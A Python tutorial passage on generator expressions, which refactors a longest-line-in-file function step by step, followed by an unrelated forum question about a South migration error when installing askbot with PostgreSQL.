Out[11]: 10
In [12]: count.close() # close the generator
In [13]: count.next()
---------------------------------------------------------------------------
StopIteration Traceback (most recent call last)
in ()
----> 1 count.next()
StopIteration:
Generator expressions
A generator expression is an extension of the list comprehension. As described above, a generator is a special kind of function that can return an intermediate value, suspend execution of its code, and resume it later. The shortcoming of a list comprehension is that it has to generate all the data at once in order to build the list object, so it is not suitable for iterating over large amounts of data.
Generator expressions solve this problem by combining list comprehensions and generators.
List comprehension
[expr for iter_var in iterable if cond_expr]
Generator expression
(expr for iter_var in iterable if cond_expr)
The syntax of the two is very similar, but a generator expression returns a generator object rather than a list object; a generator is a memory-friendly structure.
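A tiny illustration of the difference (my own example, not from the original article): both lines compute the same sum, but the list comprehension materializes all ten million squares in memory first, while the generator expression produces them one at a time.
nums = range(10000000)

total_list = sum([x * x for x in nums])  # builds the full list first
total_gen = sum(x * x for x in nums)     # lazy, constant extra memory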
A generator expression example
Let's look at the advantage of generators by improving an implementation that finds the longest line in a file.
EXAMPLE 4: a fairly conventional approach - loop over the lines and assign the longer length to the variable longest.
f = open('FILENAME', 'r')
longest = 0
while True:
linelen = len(f.readline().strip())
if not linelen:
break
if linelen > longest:
longest = linelen
f.close()
return longest
Obviously, in this example the object being iterated over is a file object.
Improvement 1:
Note that if we read all the lines of a file, we should release the file resource as early as possible. For example, a log file may be worked on by many different processes, so we cannot tolerate any single process holding on to the file handle.
f = open('FILENAME', 'r')
longest = 0
allLines = f.readlines()
f.close()
for line in allLines:
linelen = len(line.strip())
if not linelen:
break
if linelen > longest:
longest = linelen
return longest
Improvement 2:
We can use a list comprehension to simplify the code above, for example by processing each line while building the allLines list.
f = open('FILENAME', 'r')
longest = 0
allLines = [x.strip() for x in f.readlines()]
f.close()
for line in allLines:
linelen = len(line)
if not linelen:
break
if linelen > longest:
longest = linelen
return longest
Improvement 3:
When we deal with a huge file, file.readlines() is not a wise choice, because readlines() reads every line of the file. So is there another way to get at all the lines? We can use the file object's built-in iterator.
f = open('FILENAME', 'r')
allLinesLen = [len(x.strip()) for x in f]
f.close()
return max(allLinesLen) # return the largest value in the list
We no longer need a loop that compares values and keeps the current maximum; we simply store the length of every line in a list object and then take the largest value.
Improvement 4:
One problem remains: when a list comprehension is used to process the file object, all of the file's lines are read into memory and a new list object is created, which is a memory-unfriendly way of doing things. So we can use a generator expression instead of the list comprehension.
f = open('FILENAME', 'r')
allLinesLen = (len(x.strip()) for x in f)  # here each x is, in effect, yielded
f.close()
return max(allLinesLen)
Because the parentheses '()' can be omitted when a generator expression is the sole argument of a function call, the code can be simplified further:
f = open('FILENAME', 'r')
longest = max(len(x.strip()) for x in f)
f.close()
return longest
Finally, we can implement the whole thing in a single line of code and leave closing the opened file to the Python interpreter.
Of course, fewer lines of code is not automatically better; for example, the one-liner below never explicitly closes the file it opens, and it is no more efficient than Improvement 4.
return max(len(x.strip()) for x in open('FILENAME'))
Summary
When we need to iterate through an object, we should prefer a generator over an iterator, and a generator expression over a list comprehension - though of course this is not absolute. Iterators and generators are important Python features; understanding them well helps you write more Pythonic code.
|
Getting transaction errors in PostgreSQL migrations
I am trying to install askbot as a pluggable app in my Django project. It seems to work, but when I run
python manage.py migrate
or
python manage.py test askbot
I get the following error
...
File "/home/leo/Bureau/pic-13-geotopic/trunk/developpement/I/projetGeoForum/askbot/migrations/0161_add_field__user_languages.py", line 14, in forwards
keep_default=False)
File "/usr/lib/python2.7/dist-packages/south/db/generic.py", line 282, in add_column
self.execute(sql)
File "/usr/lib/python2.7/dist-packages/south/db/generic.py", line 150, in execute
cursor.execute(sql, params)
File "/usr/local/lib/python2.7/dist-packages/django/db/backends/postgresql_psycopg2/base.py", line 52, in execute
return self.cursor.execute(query, args)
django.db.utils.DatabaseError: column "languages" of relation "auth_user" already exists
I haven't changed any code in the askbot app. I think I merged settings.py correctly, and askbot can access the database successfully.
I'm using PostgreSQL 9.1.8 and psycopg2 2.4.5.
Please do not hesitate to ask if you need more information.
|